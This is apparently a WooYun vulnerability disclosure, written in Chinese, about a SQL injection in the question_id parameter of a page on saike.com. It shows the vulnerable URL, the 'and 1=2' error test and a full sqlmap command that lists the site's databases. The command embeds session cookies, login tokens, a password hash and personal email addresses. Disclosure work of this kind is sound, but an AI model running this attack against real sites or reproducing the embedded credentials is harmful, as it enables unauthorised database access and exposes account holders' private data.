WooYun.org

http://www.saike.com/official/questions/question_view.php?question_id=3402
漏洞地址正常的页面如下图：

构造and 1=2 页面返回错误，如下图：

用sqlmap进行测试，查看数据库：
sqlmap.py -u "http://www.saike.com/official/questions/question_view.php?question_id=3402" --data "save_username=99997%40qq.com; save_login_type=1; SERVERID=dnionD; PHPSESSID=8c7510672119025f2a5f08fc20ea3158; reg_token_code=01d4ed065deafdd835e2cae81f85d737; saved_email[email]=kk%40163.com; saved_password[password]=96e79218965eb72c92a549dd5a330112; member_info[last_online_date]=1442649907_1442649907; member_info[uid]=1442649909_1000000000; member_info[ccid]=1442649909_12111; member_info[user_name]=1442649909_%E7%A8%8B%E7%90%B3%E7%90%B3; member_info[email]=1442649909_kk%40163.com; member_info[user_img_url]=1442649909_%2Fphoto_new%2Favatar%2F0%2F1%2F12111227407194.jpg; member_info[gender]=1442649909_2; member_info[birth_year]=1442649909_1986; member_info[post_rights]=1442649909_1; member_info[image_rights]=1442649909_1; member_info[register_time]=1442649909_2006-09-18+11%3A16%3A18; hostname_info[uid]=1442649909_1000000000; hostname_info[hostname]=1442649909_dbf1.ccice.com; r_uname=%E7%A8%8B%E7%90%B3%E7%90%B3; hnr__user_login=pqSWo5Cfkp6Wj45cGNm8GMHkGMHkUmxelp6Smp2PjlycnHFiZ2RflKCeUmxeoZKkpKigo5WPjlxqZ5ZoamNiaWpnZpaTaGOUamOSZmVqlZVmkmRkYWJiY1JsXqaalY-OXGJhYWFhYWFhYWFSbF6Gco-OXH6gq5qdnZJgZl9hUVmImp-VoKikUX-FUWdfYmxRiICIZ2VaUXKhoZ2WiJaTfJqlYGZkaF9kZ1FZfHmFfn1dUZ2anJZReJaUnKBaUXSZo6CelmBkYl9hX2JnZmFfZ2RRhJKXkqOaYGZkaF9kZw..; uclogin_ucid=257957; uclogin_username=%E7%A8%8B%E7%90%B3%E7%90%B3; uclogin_email=kk%40163.com; uclogin_token=8447615198b5f380e5825921f2068d0f; login_token_code=a6d4152ff44f5e859eb5acf58be34682; Hm_lvt_c421c6d050e4e6ae0c2c49717a65935d=1441863273,1442135818,1442649082; Hm_lpvt_c421c6d050e4e6ae0c2c49717a65935d=1442650109" --dbs
返回结果如下图：